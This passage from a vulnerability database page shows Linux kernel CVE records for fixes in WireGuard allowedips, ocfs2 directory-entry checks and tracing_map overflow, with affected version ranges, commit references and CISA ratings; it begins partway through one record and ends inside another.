	https://git.kernel.org/stable/c/ae630de24efb123d7…
	https://git.kernel.org/stable/c/b4764f0ad3d68de8a…
	https://git.kernel.org/stable/c/217978a29c6ceca76…
	https://git.kernel.org/stable/c/6638a203abad35fa6…
	https://git.kernel.org/stable/c/2fb34bf76431e831f…
	https://git.kernel.org/stable/c/948f991c62a4018fb…

Impacted products

Vendor

Product

Version

Linux

Affected: e7096c131e5161fa3b8e52a650d7719d2857adfd , < ae630de24efb123d7199a43256396d7758f4cb75 (git)
Affected: e7096c131e5161fa3b8e52a650d7719d2857adfd , < b4764f0ad3d68de8a0b847c05f427afb86dd54e6 (git)
Affected: e7096c131e5161fa3b8e52a650d7719d2857adfd , < 217978a29c6ceca76d3c640bf94bdf50c268d801 (git)
Affected: e7096c131e5161fa3b8e52a650d7719d2857adfd , < 6638a203abad35fa636d59ac47bdbc4bc100fd74 (git)
Affected: e7096c131e5161fa3b8e52a650d7719d2857adfd , < 2fb34bf76431e831f9863cd59adc0bd1f67b0fbf (git)
Affected: e7096c131e5161fa3b8e52a650d7719d2857adfd , < 948f991c62a4018fb81d85804eeab3029c6209f8 (git)

Linux

Affected: 5.6
Unaffected: 0 , < 5.6 (semver)
Unaffected: 5.10.222 , ≤ 5.10.* (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.100 , ≤ 6.1.* (semver)
Unaffected: 6.6.41 , ≤ 6.6.* (semver)
Unaffected: 6.9.10 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42247",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:13:28.429050Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:31.003Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:02:49.575Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/wireguard/allowedips.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "ae630de24efb123d7199a43256396d7758f4cb75",
              "status": "affected",
              "version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
              "versionType": "git"
            },
            {
              "lessThan": "b4764f0ad3d68de8a0b847c05f427afb86dd54e6",
              "status": "affected",
              "version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
              "versionType": "git"
            },
            {
              "lessThan": "217978a29c6ceca76d3c640bf94bdf50c268d801",
              "status": "affected",
              "version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
              "versionType": "git"
            },
            {
              "lessThan": "6638a203abad35fa636d59ac47bdbc4bc100fd74",
              "status": "affected",
              "version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
              "versionType": "git"
            },
            {
              "lessThan": "2fb34bf76431e831f9863cd59adc0bd1f67b0fbf",
              "status": "affected",
              "version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
              "versionType": "git"
            },
            {
              "lessThan": "948f991c62a4018fb81d85804eeab3029c6209f8",
              "status": "affected",
              "version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/wireguard/allowedips.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.6"
            },
            {
              "lessThan": "5.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.222",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.100",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.41",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.222",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.100",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.41",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.10",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwireguard: allowedips: avoid unaligned 64-bit memory accesses\n\nOn the parisc platform, the kernel issues kernel warnings because\nswap_endian() tries to load a 128-bit IPv6 address from an unaligned\nmemory location:\n\n Kernel: unaligned access to 0x55f4688c in wg_allowedips_insert_v6+0x2c/0x80 [wireguard] (iir 0xf3010df)\n Kernel: unaligned access to 0x55f46884 in wg_allowedips_insert_v6+0x38/0x80 [wireguard] (iir 0xf2010dc)\n\nAvoid such unaligned memory accesses by instead using the\nget_unaligned_be64() helper macro.\n\n[Jason: replace src[8] in original patch with src+8]"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:25:01.360Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/ae630de24efb123d7199a43256396d7758f4cb75"
        },
        {
          "url": "https://git.kernel.org/stable/c/b4764f0ad3d68de8a0b847c05f427afb86dd54e6"
        },
        {
          "url": "https://git.kernel.org/stable/c/217978a29c6ceca76d3c640bf94bdf50c268d801"
        },
        {
          "url": "https://git.kernel.org/stable/c/6638a203abad35fa636d59ac47bdbc4bc100fd74"
        },
        {
          "url": "https://git.kernel.org/stable/c/2fb34bf76431e831f9863cd59adc0bd1f67b0fbf"
        },
        {
          "url": "https://git.kernel.org/stable/c/948f991c62a4018fb81d85804eeab3029c6209f8"
        }
      ],
      "title": "wireguard: allowedips: avoid unaligned 64-bit memory accesses",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42247",
    "datePublished": "2024-08-07T15:14:32.232Z",
    "dateReserved": "2024-07-30T07:40:12.254Z",
    "dateUpdated": "2025-11-03T22:02:49.575Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-41015 (GCVE-0-2024-41015)

Vulnerability from cvelistv5 – Published: 2024-07-29 06:37 – Updated: 2026-01-05 10:37

Title

ocfs2: add bounds checking to ocfs2_check_dir_entry()

Summary

In the Linux kernel, the following vulnerability has been resolved: ocfs2: add bounds checking to ocfs2_check_dir_entry() This adds sanity checks for ocfs2_dir_entry to make sure all members of ocfs2_dir_entry don't stray beyond valid memory region.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/13d38c00df97289e6…
	https://git.kernel.org/stable/c/564d23cc5b216211e…
	https://git.kernel.org/stable/c/77495e5da5cb110a8…
	https://git.kernel.org/stable/c/53de17ad01cb5f6f8…
	https://git.kernel.org/stable/c/fd65685594ee707cb…
	https://git.kernel.org/stable/c/e05a24289db90f76f…
	https://git.kernel.org/stable/c/624b380074f0dc209…
	https://git.kernel.org/stable/c/edb2e67dd4626b06f…
	https://git.kernel.org/stable/c/255547c6bb8940a97…

Impacted products

Vendor

Product

Version

Linux

Affected: 23193e513d1cd69411469f028d56fd175d4a6b07 , < 13d38c00df97289e6fba2e54193959293fd910d2 (git)
Affected: 23193e513d1cd69411469f028d56fd175d4a6b07 , < 564d23cc5b216211e1694d53f7e45959396874d0 (git)
Affected: 23193e513d1cd69411469f028d56fd175d4a6b07 , < 77495e5da5cb110a8fed27b052c77853fe282176 (git)
Affected: 23193e513d1cd69411469f028d56fd175d4a6b07 , < 53de17ad01cb5f6f8426f597e9d5c87d4cf53bb7 (git)
Affected: 23193e513d1cd69411469f028d56fd175d4a6b07 , < fd65685594ee707cbf3ddf22ebb73697786ac114 (git)
Affected: 23193e513d1cd69411469f028d56fd175d4a6b07 , < e05a24289db90f76ff606086aadd62d068a88dcd (git)
Affected: 23193e513d1cd69411469f028d56fd175d4a6b07 , < 624b380074f0dc209fb8706db3295c735079f34c (git)
Affected: 23193e513d1cd69411469f028d56fd175d4a6b07 , < edb2e67dd4626b06fd7eb37252d5067912e78d59 (git)
Affected: 23193e513d1cd69411469f028d56fd175d4a6b07 , < 255547c6bb8940a97eea94ef9d464ea5967763fb (git)

Linux

Affected: 2.6.24
Unaffected: 0 , < 2.6.24 (semver)
Unaffected: 4.19.319 , ≤ 4.19.* (semver)
Unaffected: 5.4.281 , ≤ 5.4.* (semver)
Unaffected: 5.10.223 , ≤ 5.10.* (semver)
Unaffected: 5.15.164 , ≤ 5.15.* (semver)
Unaffected: 6.1.102 , ≤ 6.1.* (semver)
Unaffected: 6.6.43 , ≤ 6.6.* (semver)
Unaffected: 6.9.12 , ≤ 6.9.* (semver)
Unaffected: 6.10.2 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:59:17.542Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/13d38c00df97289e6fba2e54193959293fd910d2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/564d23cc5b216211e1694d53f7e45959396874d0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/77495e5da5cb110a8fed27b052c77853fe282176"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/53de17ad01cb5f6f8426f597e9d5c87d4cf53bb7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fd65685594ee707cbf3ddf22ebb73697786ac114"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e05a24289db90f76ff606086aadd62d068a88dcd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/624b380074f0dc209fb8706db3295c735079f34c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/edb2e67dd4626b06fd7eb37252d5067912e78d59"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/255547c6bb8940a97eea94ef9d464ea5967763fb"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41015",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:24:46.545116Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:05.831Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/ocfs2/dir.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "13d38c00df97289e6fba2e54193959293fd910d2",
              "status": "affected",
              "version": "23193e513d1cd69411469f028d56fd175d4a6b07",
              "versionType": "git"
            },
            {
              "lessThan": "564d23cc5b216211e1694d53f7e45959396874d0",
              "status": "affected",
              "version": "23193e513d1cd69411469f028d56fd175d4a6b07",
              "versionType": "git"
            },
            {
              "lessThan": "77495e5da5cb110a8fed27b052c77853fe282176",
              "status": "affected",
              "version": "23193e513d1cd69411469f028d56fd175d4a6b07",
              "versionType": "git"
            },
            {
              "lessThan": "53de17ad01cb5f6f8426f597e9d5c87d4cf53bb7",
              "status": "affected",
              "version": "23193e513d1cd69411469f028d56fd175d4a6b07",
              "versionType": "git"
            },
            {
              "lessThan": "fd65685594ee707cbf3ddf22ebb73697786ac114",
              "status": "affected",
              "version": "23193e513d1cd69411469f028d56fd175d4a6b07",
              "versionType": "git"
            },
            {
              "lessThan": "e05a24289db90f76ff606086aadd62d068a88dcd",
              "status": "affected",
              "version": "23193e513d1cd69411469f028d56fd175d4a6b07",
              "versionType": "git"
            },
            {
              "lessThan": "624b380074f0dc209fb8706db3295c735079f34c",
              "status": "affected",
              "version": "23193e513d1cd69411469f028d56fd175d4a6b07",
              "versionType": "git"
            },
            {
              "lessThan": "edb2e67dd4626b06fd7eb37252d5067912e78d59",
              "status": "affected",
              "version": "23193e513d1cd69411469f028d56fd175d4a6b07",
              "versionType": "git"
            },
            {
              "lessThan": "255547c6bb8940a97eea94ef9d464ea5967763fb",
              "status": "affected",
              "version": "23193e513d1cd69411469f028d56fd175d4a6b07",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/ocfs2/dir.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.24"
            },
            {
              "lessThan": "2.6.24",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.319",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.281",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.223",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.164",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.102",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.43",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.319",
                  "versionStartIncluding": "2.6.24",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.281",
                  "versionStartIncluding": "2.6.24",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.223",
                  "versionStartIncluding": "2.6.24",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.164",
                  "versionStartIncluding": "2.6.24",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.102",
                  "versionStartIncluding": "2.6.24",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.43",
                  "versionStartIncluding": "2.6.24",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.12",
                  "versionStartIncluding": "2.6.24",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.2",
                  "versionStartIncluding": "2.6.24",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "2.6.24",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nocfs2: add bounds checking to ocfs2_check_dir_entry()\n\nThis adds sanity checks for ocfs2_dir_entry to make sure all members of\nocfs2_dir_entry don\u0027t stray beyond valid memory region."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:37:22.624Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/13d38c00df97289e6fba2e54193959293fd910d2"
        },
        {
          "url": "https://git.kernel.org/stable/c/564d23cc5b216211e1694d53f7e45959396874d0"
        },
        {
          "url": "https://git.kernel.org/stable/c/77495e5da5cb110a8fed27b052c77853fe282176"
        },
        {
          "url": "https://git.kernel.org/stable/c/53de17ad01cb5f6f8426f597e9d5c87d4cf53bb7"
        },
        {
          "url": "https://git.kernel.org/stable/c/fd65685594ee707cbf3ddf22ebb73697786ac114"
        },
        {
          "url": "https://git.kernel.org/stable/c/e05a24289db90f76ff606086aadd62d068a88dcd"
        },
        {
          "url": "https://git.kernel.org/stable/c/624b380074f0dc209fb8706db3295c735079f34c"
        },
        {
          "url": "https://git.kernel.org/stable/c/edb2e67dd4626b06fd7eb37252d5067912e78d59"
        },
        {
          "url": "https://git.kernel.org/stable/c/255547c6bb8940a97eea94ef9d464ea5967763fb"
        }
      ],
      "title": "ocfs2: add bounds checking to ocfs2_check_dir_entry()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41015",
    "datePublished": "2024-07-29T06:37:01.651Z",
    "dateReserved": "2024-07-12T12:17:45.612Z",
    "dateUpdated": "2026-01-05T10:37:22.624Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-43890 (GCVE-0-2024-43890)

Vulnerability from cvelistv5 – Published: 2024-08-26 10:10 – Updated: 2025-11-03 22:06

Title

tracing: Fix overflow in get_free_elt()

Summary

In the Linux kernel, the following vulnerability has been resolved: tracing: Fix overflow in get_free_elt() "tracing_map->next_elt" in get_free_elt() is at risk of overflowing. Once it overflows, new elements can still be inserted into the tracing_map even though the maximum number of elements (`max_elts`) has been reached. Continuing to insert elements after the overflow could result in the tracing_map containing "tracing_map->max_size" elements, leaving no empty entries. If any attempt is made to insert an element into a full tracing_map using `__tracing_map_insert()`, it will cause an infinite loop with preemption disabled, leading to a CPU hang problem. Fix this by preventing any further increments to "tracing_map->next_elt" once it reaches "tracing_map->max_elt".

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/302ceb625d7b990db…
	https://git.kernel.org/stable/c/d3e4dbc2858fe85d1…
	https://git.kernel.org/stable/c/eb223bf01e688dfe3…
	https://git.kernel.org/stable/c/cd10d186a5409a1fe…
	https://git.kernel.org/stable/c/788ea62499b3c1854…
	https://git.kernel.org/stable/c/a172c7b22bc2feaf4…
	https://git.kernel.org/stable/c/236bb4690773ab686…
	https://git.kernel.org/stable/c/bcf86c01ca4676316…

Impacted products

Vendor

Product

Version

Linux

Affected: 08d43a5fa063e03c860f2f391a30c388bcbc948e , < 302ceb625d7b990db205a15e371f9a71238de91c (git)
Affected: 08d43a5fa063e03c860f2f391a30c388bcbc948e , < d3e4dbc2858fe85d1dbd2e72a9fc5dea988b5c18 (git)
Affected: 08d43a5fa063e03c860f2f391a30c388bcbc948e , < eb223bf01e688dfe37e813c8988ee11c8c9f8d0a (git)
Affected: 08d43a5fa063e03c860f2f391a30c388bcbc948e , < cd10d186a5409a1fe6e976df82858e9773a698da (git)
Affected: 08d43a5fa063e03c860f2f391a30c388bcbc948e , < 788ea62499b3c18541fd6d621964d8fafbc4aec5 (git)
Affected: 08d43a5fa063e03c860f2f391a30c388bcbc948e , < a172c7b22bc2feaf489cfc6d6865f7237134fdf8 (git)
Affected: 08d43a5fa063e03c860f2f391a30c388bcbc948e , < 236bb4690773ab6869b40bedc7bc8d889e36f9d6 (git)
Affected: 08d43a5fa063e03c860f2f391a30c388bcbc948e , < bcf86c01ca4676316557dd482c8416ece8c2e143 (git)

Linux

Affected: 4.7
Unaffected: 0 , < 4.7 (semver)
Unaffected: 4.19.320 , ≤ 4.19.* (semver)
Unaffected: 5.4.282 , ≤ 5.4.* (semver)
Unaffected: 5.10.224 , ≤ 5.10.* (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.105 , ≤ 6.1.* (semver)
Unaffected: 6.6.46 , ≤ 6.6.* (semver)
Unaffected: 6.10.5 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-43890",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:29:25.469360Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:32:58.468Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:06:48.215Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "kernel/trace/tracing_map.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "302ceb625d7b990db205a15e371f9a71238de91c",
              "status": "affected",
              "version": "08d43a5fa063e03c860f2f391a30c388bcbc948e",
              "versionType": "git"
            },
            {
              "lessThan": "d3e4dbc2858fe85d1dbd2e72a9fc5dea988b5c18",
              "status": "affected",
              "version": "08d43a5fa063e03c860f2f391a30c388bcbc948e",
              "versionType": "git"
            },
            {
              "lessThan": "eb223bf01e688dfe37e813c8988ee11c8c9f8d0a",
              "status": "affected",
              "version": "08d43a5fa063e03c860f2f391a30c388bcbc948e",
              "versionType": "git"
            },
            {
              "lessThan": "cd10d186a5409a1fe6e976df82858e9773a698da",
              "status": "affected",
              "version": "08d43a5fa063e03c860f2f391a30c388bcbc948e",
              "versionType": "git"
            },
            {
              "lessThan": "788ea62499b3c18541fd6d621964d8fafbc4aec5",
              "status": "affected",
              "version": "08d43a5fa063e03c860f2f391a30c388bcbc948e",
              "versionType": "git"
            },
            {
              "lessThan": "a172c7b22bc2feaf489cfc6d6865f7237134fdf8",
              "status": "affected",
              "version": "08d43a5fa063e03c860f2f391a30c388bcbc948e",
              "versionType": "git"
            },
            {
              "lessThan": "236bb4690773ab6869b40bedc7bc8d889e36f9d6",
              "status": "affected",
              "version": "08d43a5fa063e03c860f2f391a30c388bcbc948e",
              "versionType": "git"
            },
            {
              "lessThan": "bcf86c01ca4676316557dd482c8416ece8c2e143",
              "status": "affected",
              "version": "08d43a5fa063e03c860f2f391a30c388bcbc948e",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "kernel/trace/tracing_map.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.7"
            },
            {
              "lessThan": "4.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.320",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.282",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.105",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.46",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.320",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.282",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.224",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.105",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.46",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.5",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
